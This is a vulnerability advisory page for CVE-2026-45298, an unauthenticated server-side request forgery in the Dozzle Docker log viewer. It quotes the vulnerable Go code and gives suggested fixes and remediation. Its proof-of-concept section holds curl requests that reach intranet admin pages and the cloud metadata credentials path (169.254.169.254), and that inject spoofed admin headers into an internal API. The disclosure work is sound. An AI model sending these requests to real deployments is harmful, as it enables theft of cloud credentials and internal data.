Skip to main content

Dozzle CVE-2026-45298

HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-18 https://github.com/amir20/dozzle GHSA-3v9w-6365-9w54
8.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.6 HIGH
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 18, 2026 - 17:31 vuln.today
Analysis Generated
May 18, 2026 - 17:31 vuln.today

DescriptionGitHub Advisory

Summary

In a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that:

  • Sends an HTTP POST to the supplied URL with attacker-controlled request headers, and
  • Returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx.

This is a classic full-reflection SSRF, pre-auth, against any IP/port that dozzle's host can route to - including private subnets, link-local cloud metadata, and loopback services.

Affected versions

internal/notification/dispatcher/webhook.go and internal/web/notifications.go at commit 581bab3a43ead84ea4d009a469a17af98fb3377f and earlier (the test-webhook handler has been in place since the notifications subsystem was added).

Default-deploy reachability chain

main.go:58-59           → enforces AuthProvider in {none, forward-proxy, simple}
support/cli/args.go:18  → AuthProvider default is "none"
main.go:231-243         → when AuthProvider == "none", web.AuthProvider stays at NONE
internal/web/routes.go:130-132, 137-138 → auth middleware only registered if Provider != NONE
internal/web/routes.go:172-188          → /api/notifications/* (incl. /test-webhook) is inside that conditional Group

So the default Quickstart deploy

bash
docker run -v /var/run/docker.sock:/var/run/docker.sock -p 8080:8080 amir20/dozzle:latest

exposes POST /api/notifications/test-webhook to the network without any authentication.

The vulnerable handler

go
// internal/web/notifications.go:652-716
func (h *handler) testWebhook(w http.ResponseWriter, r *http.Request) {
    var input TestWebhookInput
    if err := json.NewDecoder(r.Body).Decode(&input); err != nil { ... }
    ...
    webhook, err := dispatcher.NewWebhookDispatcher("test", input.URL, templateStr, input.Headers)
    ...
    result := webhook.SendTest(r.Context(), mockNotification)
    ...
    writeJSON(w, http.StatusOK, &TestWebhookResult{
        Success:    result.Success,
        StatusCode: statusCode,
        Error:      errStr,
    })
}

input.URL and input.Headers are entirely user-controlled. No host/IP/scheme validation anywhere.

The reflection sink

go
// internal/notification/dispatcher/webhook.go:88-120
req, err := http.NewRequestWithContext(ctx, http.MethodPost, w.URL, bytes.NewReader(payload))
...
for k, v := range w.Headers { req.Header.Set(k, v) }
...
resp, err := w.client.Do(req)
...
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
    limitedReader := io.LimitReader(resp.Body, 1024*1024)   // 1 MB
    responseBody, _ := io.ReadAll(limitedReader)
    ...
    return TestResult{
        Success:    false,
        StatusCode: resp.StatusCode,
        Error:      fmt.Sprintf("webhook returned status code %d: %s",
                                 resp.StatusCode, string(responseBody)),
    }
}

When the SSRF target returns non-2xx, up to 1 MB of response body becomes part of Error, which is then JSON-encoded back to the attacker.

PoC

A. Read intranet admin-panel response bodies (most common path)

Most internal admin UIs respond to anonymous POST with 401/403 + an HTML or JSON body that contains version banners, CSRF tokens, internal hostnames, etc.

bash
curl -X POST -H "Content-Type: application/json" \
  -d '{"url":"http://192.168.1.1/admin/index.html","headers":{}}' \
  http://dozzle.example.com/api/notifications/test-webhook

Response shape (writeJSON to the public Internet):

json
{
  "Success": false,
  "StatusCode": 401,
  "Error": "webhook returned status code 401: <html><head>... full intranet HTML body, up to 1MB ...</html>"
}

B. Cloud IMDS reachability probe

bash
curl -X POST -H "Content-Type: application/json" \
  -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/","headers":{}}' \
  http://dozzle.example.com/api/notifications/test-webhook

If StatusCode == 200, IMDS is reachable. For AWS IMDSv2 the unauth POST returns 401 + body which IS reflected.

C. Header injection downstream

bash
curl -X POST -H "Content-Type: application/json" \
  -d '{
    "url":"http://internal-api.example.com:8080/admin/users",
    "headers":{"X-Forwarded-User":"admin","X-Real-IP":"127.0.0.1"}
  }' \
  http://dozzle.example.com/api/notifications/test-webhook

Suggested fix

  1. Refuse test-webhook when Authorization.Provider == NONE. This is an admin-configuration helper; it should not be reachable on a deploy that has no concept of admin.
  2. SSRF-harden WebhookDispatcher. Resolve URL host once via net.LookupIP; refuse private/loopback/link-local/CGNAT; pin http.Transport.DialContext to the resolved IP (closes DNS-rebinding TOCTOU). Refuse non-http(s) schemes.
  3. Stop reflecting response body. UX for "test webhook" only needs Success: bool, StatusCode: int.

Severity

  • CVSS 3.1: High - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N ≈ 7.5 in default no-auth deploy.
  • Auth: none in default deploy. With DOZZLE_AUTH_PROVIDER=simple configured, the same primitive is post-auth.

Reproduction environment

  • Tested against: amir20/dozzle:8.x Docker image (commit 581bab3a43ead84ea4d009a469a17af98fb3377f).
  • Code locations:
  • Handler: internal/web/notifications.go:652-716
  • Sink: internal/notification/dispatcher/webhook.go:88-120
  • Auth gate: internal/web/routes.go:130-138, 172-188
  • Default provider: internal/support/cli/args.go:18, main.go:231

Reporter

Eddie Ran. Filed via reporter API per dozzle's SECURITY.md.

AnalysisAI

Server-side request forgery in Dozzle (amir20/dozzle) versions through 8.14.12 allows remote unauthenticated attackers to coerce the Dozzle host into issuing arbitrary HTTP POST requests and reflects up to 1MB of the response body back. The flaw lives in POST /api/notifications/test-webhook, which is exposed without authentication in the documented default Docker quickstart deploy (DOZZLE_AUTH_PROVIDER unset). No public exploit identified at time of analysis, but a detailed proof-of-concept accompanies the GHSA advisory.

Technical ContextAI

Dozzle is a self-hosted real-time Docker log viewer written in Go that is commonly bound to the host's docker.sock and exposed on port 8080. The root cause is CWE-918 (Server-Side Request Forgery): the testWebhook handler in internal/web/notifications.go:652-716 deserializes a JSON body containing a fully attacker-controlled URL and header map, hands them to dispatcher.NewWebhookDispatcher, and the dispatcher (internal/notification/dispatcher/webhook.go:88-120) performs an http.Client.Do with no scheme, host, or IP validation. When the upstream responds non-2xx, up to 1MiB of the response body is concatenated into the Error field of the JSON response, producing a full read-SSRF primitive. Authentication is governed by internal/web/routes.go: the /api/notifications/* group is only wrapped in auth middleware when AuthProvider != NONE, and the default in support/cli/args.go:18 is NONE - so the documented quickstart leaves the sink reachable pre-auth. The CPE identifier is pkg:go/github.com_amir20_dozzle.

RemediationAI

No vendor-released patch identified at time of analysis (vulnerable range is documented as <= 8.14.12 with fixed-in: None), so the immediate compensating control is to set DOZZLE_AUTH_PROVIDER=simple (or forward-proxy) so the /api/notifications/* route group is wrapped in auth middleware - this converts the SSRF from pre-auth to post-auth without functional regression for log-viewing users, at the cost of requiring credentials for legitimate access. Until a release ships, restrict network reachability of the Dozzle port (8080) to trusted management networks via firewall/reverse-proxy ACLs, and block egress from the Dozzle container to RFC1918, 127.0.0.0/8, 169.254.0.0/16, and other internal ranges so SSRF cannot reach cloud IMDS or intranet hosts (trade-off: legitimate webhook destinations on private networks will also be blocked). The advisory's suggested upstream fixes - refuse test-webhook when AuthProvider==NONE, validate the resolved IP against private/loopback/link-local/CGNAT ranges, pin http.Transport.DialContext to the resolved IP to defeat DNS rebinding, restrict schemes to http(s), and stop reflecting the response body in the Error field - should be tracked at https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54 for the eventual patched release.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-45298 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy